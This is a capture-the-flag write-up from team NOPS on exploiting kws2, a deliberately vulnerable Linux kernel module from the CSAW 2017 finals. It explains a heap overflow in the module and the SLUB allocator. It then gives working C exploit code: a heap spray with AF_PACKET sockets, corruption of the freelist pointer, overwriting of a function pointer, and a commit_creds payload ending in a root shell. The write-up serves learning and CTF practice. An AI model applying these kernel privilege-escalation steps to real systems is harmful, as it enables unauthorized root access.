Introduction

As team NOPS we took part to the European edition of the CSAW 2017 finals, held in Valence (FR). The overall experience was really enjoyable and after 24 hours of competition we ranked 2nd!

In this post we will show how we solved kws2. This was the second part of a two stage challenge and so it was accessible only after solving the first part. In this post we will cover only the second part but the curious reader can find a detailed walk-through of the first one here.

Unfortunately we solved the challenge only (weeks) after the CTF ended. Kudos to Eat Sleep Pwn Repeat for solving it after a few hours the finals started!

kws2 is vulnerable kernel module and thus the goal of the challenge - as you might imagine - is to exploit it and gain root on the box. Long story short: the module a key-value store for Python objects running at ring 0 (yes, you read it right!).

The challenge source code was released by the organizers during the competition and can be found along with the kernel module here. The challenge was hosted on a standard Ubuntu 16.04.3 running the Linux kernel 4.4.0-98. The only security feature shipped with this kernel was KASLR, so SMEP, SMAP and SLUB freelist randomization randomization were not in place.

The challenge

The source code of the challenge is pretty long so we will focus only on the interesting parts. The first function executed is init_module and which gets called when the module is inserted. This function does nothing crazy: it initializes an hashmap used to track the objects and registers a device (/dev/kws) using the misc_register kernel function. The latter function makes the freshly created device accessible through the ioctl syscall.

static struct file_operations fops = {
    .owner = THIS_MODULE,
    .unlocked_ioctl = handleIoctl
};

static struct miscdevice dev = {
    MISC_DYNAMIC_MINOR, "kws" , &fops
};

int init_module(void) {
    printk("Hello world\n");
    mainMap = kmalloc(sizeof(struct Hashmap), GFP_KERNEL);
    hashmapInit(mainMap);
    int ret = misc_register(&dev); 
    return 0;
}

The function which handles the user-space issued ioctls is handleIoctl (also redacted to leave only the interesting part).

static int handleIoctl(struct file *f, unsigned int cmd, void** arg) {
    printk("Got IOCTL %x\n",cmd);
    if (cmd == 1) { // store
        void* key_ptr;
        void* value_ptr;
        if (get_user(key_ptr, arg) || get_user(value_ptr, &arg[1]))
            return -EINVAL;
        struct Object* key = deserializeRoot(key_ptr);
        if (key == NULL)
            return -EINVAL;

        struct Object* value = deserializeRoot(value_ptr);
        if (value == NULL)
            return -EINVAL;

        hashmapInsert(mainMap, key, value);
        printk("Successfully created object\n");
        return 0;
    }

    if (cmd == 4) {  // get
     [redacted]
    }

    if (cmd == 5) { // delete
     [redacted]
    }
    return EINVAL;
}

To comply with key-value store standard APIs kws2 implements three methods: store, get and delete. Let's breakdown the case where the user issued a store command. First the function retrieves the key and the value passed by the user (using get_user), it then deserialize them (using deserializeRoot) and finally insert the two into an hashmap. And here is where the real fun begins. deserializeRoot - which takes in input a pointer to a Python object - allocates an array of 200 pointers in the kernel heap, zeroes the objCount variable and then pass the Python object pointer to deserialize.

struct Object {
    int type;
    void* data;
};

struct Object* deserializeRoot(void* ptr) {
    objTracker = kmalloc(sizeof(void*) * 200, GFP_KERNEL);
    memset(objTracker, 0, sizeof(void*) * 200);
    objCount = 0;

    struct Object* root = deserialize(ptr);

    if (root == NULL)
        return NULL;

    [...redacted...]
}


struct Object* deserialize(void* ptr) {
    int type = getType(ptr);
    if (!type)
        return NULL;


    struct Object* obj = NULL;

    if (type == TYPE_DICT) {
        // Check if we used this pointer yet.
        // If we did don't do it again to prevent circular structure
        for (int i=0; i<objCount; i++) {
            if (objTracker[i*2] == ptr)
                return NULL;
        }

        obj = deserializeDict(ptr);

        trackObject(ptr, obj);
        return obj;
    } else if (type == TYPE_STRING || type == TYPE_INT || type == TYPE_FLOAT) {
        return deserializePrimative(ptr);
    } else {
        return NULL;
        printk("Unknown..\n");
    }
}

struct Object* deserializePrimative(void* ptr) {
    int type = getType(ptr);
    if (!type)
        return NULL;


    struct Object* obj;
    if (type == TYPE_INT || type == TYPE_FLOAT) {

        uint64_t value;
        if (get_user(value, (uint64_t*)(ptr+0x10)))
            return NULL;
        obj = kmalloc(sizeof(struct Object), GFP_KERNEL);
        obj->data = value;
    } else {
        obj = deserializeString(ptr);
    }
    obj->type = type;

    trackObject(ptr, obj);

    return obj;
}

void trackObject(void* ptr, struct Object* obj) {
    objTracker[objCount*2] = ptr;
    objTracker[objCount*2+1] = obj;
    objCount++;
}

Depending on the type of the Python object, deserialize calls two different function:

deserializeDict: which handles Python dictionaries;
deserializePrimative: which handles Python str, int and float.

Both functions parse the userspace object and create a equivalent kernel version of it (struct Object). The new object and the userspace one are saved by trackObject into the objTracker array. This function takes a pointer to the objects and stores them in two adjacent positions of objTracker without checking the value of objCount. And this is exactly were the bug lies. objTracker was allocated earlier with a static size of 200, so what happens if, for example, we pass a dictionary with 150 keys and 150 values? There we go, we just got a kernel heap overflow!

Hopefully this walk-through of the code was enough to get a proper background on how the challenge works. For the next sections what's important to bear in mind is that:

we can overflow the kernel heap
we can overflow in "chunks" of 16 bytes each
for each chunk the first 8 bytes are under our control (pointer to our userspace object), while the second 8 are not under our control (pointer to the "parsed" kernel object)

A few notes on how the slab works

The general-purpose allocator used by the kernel of this challenge is the SLUB allocator. We want to give you a quick overview on how it manages memory in kernel-land to better understand the following sections of this writeup. If you are curious to examine it more in depth, you can have a look at files /mm/slub.c and /mm/slab_common.c of the kernel source code.

In kernel space performances matter and kernel object allocation has to be as fast as possible. For this reason the SLUB allocator has a variable number of caches, each of which is specific to a particular type of object. For example, all the inode objects allocated by the kernel will be stored in the inode_cache, while, on the other hand, task_struct objects are contained in the task_struct cache. Moreover there exist some general-purpose caches which contain objects that have similar size. For example, kmalloc-512 contains all the object with 256 < size <= 512. You can monitor all the cache types your system is using by reading /proc/slabinfo.

Imagine caches as big cardboard boxes with different labels on them. If you open one of these boxes you will find some other smaller boxes inside. These are called slabs. A slab is nothing more than a set of contiguous memory pages reserved by the kernel. Imagine again the memory pages as even smaller boxes but contained in the slab boxes this time. Here we can finally store our object.

Let's go up by one level to say something more about slabs. The kernel must be fast and it must orchestrate concurrency among different CPUs. The SLUB allocator has two different slabs: a CPU private slabs (struct kmem_cache_cpu), and shared slabs (struct kmem_cache_node). Operations on the per cpu slabs do not need any locks (fast-path), while shared slabs (slow-path) can be accessed by every cpu.

The crucial part to understand how we exploited this challenge is the freelist pointer, that is used to point to the first free slot of a slab. The SLUB allocator provides per cpu freelists (fast-path) and a shared freelist (slow-path) for every cache. The head of the freelist is retrieved from kmem_cache_cpu or, if the list is empty, from a struct page given back by kmem_cache_node. The freelist itself is stored on the free slots of a slab.

Every time we call kmalloc(), the allocation will be performed on the address pointed by the head of the freelist. On this free slot, usually at offset 0, there is a pointer to the next free slot. The pointer will become the new head of the freelist.

It is clear that if we can overflow an object in a slab, sooner or later we will end up hijacking the freelist.

What it did not work

The first thing we tried to do was the 101 of kernel heap exploitation: allocate a kernel object adjacent to objTracker and overflow into it. Remember that the size of objTracker is 1600 bytes so it will be allocated in the slab-2048. Since the kernel has plenty of objects we wrote a gdb-python script to find suitable ones. In this context suitable means that the object has to contain at least one function pointer and has 1025 < size <= 2048. . The output of the script can be found here. As you can see, the script found 51 structures which respect these two constraints. Some of them looks "more promising" than others. An implicit constraint that was never explicitly pointed out is that the object has to be allocatable from userland, for example, through a system call. In this sense struct tcp_sock sounds a better target than struct pci_bus.

All of our attempts at solving the challenge in this way failed miserably: the kernel always segfaulted. After targeting several structures, we soon realized that the kernel always checks or uses some fields of the structure before calling one overwritten function pointer. Given the constraint of the overflow, these fields always ended up with meaningless and not controllable values, thus making the kernel to panic.

As of today, it is still an open question for us if it is possible to succeed using this strategy. What came out after further discussion and reading is that is indeed possible to "massage" the slab and allocate close to each other structures belonging to different cache (and so having size outside the 1025-2048 range). Frankly we didn't try this solution because in the meantime we became aware of the existence of the holy grail of slub exploiting: the fearsome freelist pointer.

What it did work

The kernel is very sensitive and memory corruption on kernel heap must be handled with care. Our initial exploitation plan was not that easy to manage because it was forcing us to corrupt all the memory up to a function pointer. Our next approach is instead to control the freelist pointer to force the kernel to allocate memory in userspace. This is something doable since SMAP and SMEP are not enabled. Moreover, if we let the kernel allocate an object in user memory, we can easily overwrite a function pointer to achieve privilege escalation.

The general algorithm of our final exploit works like this:

pad the kmalloc-2048 cache to get rid of memory fragmentation;
allocate our objTracker, overflow and corrupt the successive free object "metadata" with a userspace address (b);
allocate two kernel object in kmalloc-2048 to update the freelist pointer (c-e);
allocate another kernel object in kmalloc-2048, this time stored in userspace (f);
overwrite a function pointer and trigger the exploit.

kernel memory

Now the details.

Our favorite candidate to both massage the kernel heap and succeed in exploitation was struct packet_sock, allocated by the kernel when we create a socket of type AF_PACKET. It also has a function pointer at byte 1304 named xmit. For reference, the same object has been used here by Andrey Konovalov to exploit a vulnerability on packet sockets.

The first step was to fill the holes in kmalloc-2048. In this way we reach a point where subsequent allocations in this cache are adjacent in memory. 350 AF_PACKET sockets seem to be enough on our machine:

for (i = 0; i < 350; i++) {
   int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
   if (s < 0) {
       perror("[-] socket(AF_PACKET)");
        exit(EXIT_FAILURE);
   }
}

At this point it's time to craft an ad-hoc python dictionary that will overflow its 2048B boundary and write a userspace address into the next-free-object metadata of the adjacent object. Fortunately we can forget about the low-level implementation details of Python dictionaries, since we can use the Python APIs from C. Remember that objTracker can store 200 pointers at most. The vulnerable kernel modules stores 2 pointers for a dictionary key and 2 pointers for the linked value. The first pointer keeps track of the python object in userspace while the second is a kernelspace pointer. In other words, for each key/value in the python dictionary we get 4 slots occupied in objTracker. If the dictionary has size > 50 we are overflowing objTracker. On the other hand, if the size is 64 we perfectly fill up our memory slot in kmalloc-2048. From now on, if we prepare a dictionary with even more elements, we will corrupt the next slot on the slab.

The plan is to create a dictionary with 65 entries. Luckily the 65th entry will make the module overwrite the address of the next free object in the slab with an address we control.

PyObject * setup_object(PyObject **ptr) {

   long i = 0;
   PyObject *dict = PyDict_New();
   PyObject *val;
   for (i = 0; i < 64; i++) {
      val = PyInt_FromLong(i);
      PyDict_SetItem(dict, val, val);
   }

   while (1) {
      val = PyInt_FromLong(i++);
      if (((unsigned long)val & 0xfff) == 0) {
         PyDict_SetItem(dict, val, val);
         printf("[.] obj 65 = %p\n", (void *)val);
         break;
      }
   }
   *ptr = val;
   return dict;
}

The code above creates a dictionary that in Python terms would look like {0:0, 1:1, 2:2, ..., 64:64}. The insertion of the 65th element is a little bit different. We insert a Python int, as key and value, only when the interpreter gives us an object stored on memory that is page-aligned.

The module expects this dictionary as a value, so we associate a random key to it and finally pass everything to the kernel through an ioctl call.

PyObject *dict = setup_object((PyObject **) &ptr);
PyObject *key = PyString_FromString("a");
data[0] = (void *) key;
data[1] = (void *) dict;

printf("[.] send to kernel\n");
fd = open("/dev/kws", O_WRONLY);
if (fd == -1) {
   printf("[-] cannot open /dev/kws\n");
   return 0;
}

rv = ioctl(fd, 1, data);
if (rv == -1) {
   perror("[-] ioctl()");
   return 0;
}

At this point the freelist pointer is already corrupted!

memset((void *)ptr, 0, 0x800);

First of all, we zero out the userspace free-slot the kernel will use. Therefore when the kernel will allocate the target object in userspace, it will find 0 as freelist pointer. This is to ensure that the kernel will request a new page for future allocations, and will not use whatever value was written at ptr.

printf("[.] corrupt SLUB freelist\n");
/*Take free slot where objTracker was sitting before*/
sk = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
/*Take adjacent slot with our next-free pointer*/
sk = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
/*Take dummy free slot on userspace*/
sk = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));

We have to allocate three objects on the cache we are attacking. With the first packet socket, the kernel will allocate an object were objTracker was sitting before being freed. With the second socket the kernel will overwrite the global freelist pointer with our controlled address. This means that next time a 2048B object is requested, the kernel will store it user space. Bingo! Since we use AF_PACKET, we can overwrite the xmit() function pointer with our get_root_payload() address. Of course the payload must be convenient to execute. For AF_PACKET, xmit() is called whenever a user sends a packet on the packet socket.

You can see below the payload to escalate privileges...nothing new, always the same stuff already seen thousands of times.

#define COMMIT_CREDS     0xffffffff810a2850ul
#define PREPARE_KERNEL_CRED    0xffffffff810a2c40ul

typedef unsigned long __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

void get_root_payload(void) {
    ((_commit_creds) COMMIT_CREDS)(
        ((_prepare_kernel_cred)PREPARE_KERNEL_CRED)(0)
    );
}

If everything worked correctly, get_shell should have forked a privileged shell.

[.] starting
[.] namespace sandbox set up
[.] commit_creds:        ffffffff810a2850
[.] prepare_kernel_cred: ffffffff810a2c40
[.] padding heap
[.] setup Py object
[.] obj 65 = 0x1441000
[.] trigger

root@ubuntu:/home/user#
root@ubuntu:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/home/user#

The full exploit code can be found here

Conclusions

Overall we had a lot of fun exploiting this challenge and learned a lot about the inner workings of the kernel allocator. Kudos to the challenge creator and the orgas for such a nice challenge!

published on 2018-01-25 by invano, pagabuc, nsr

Nops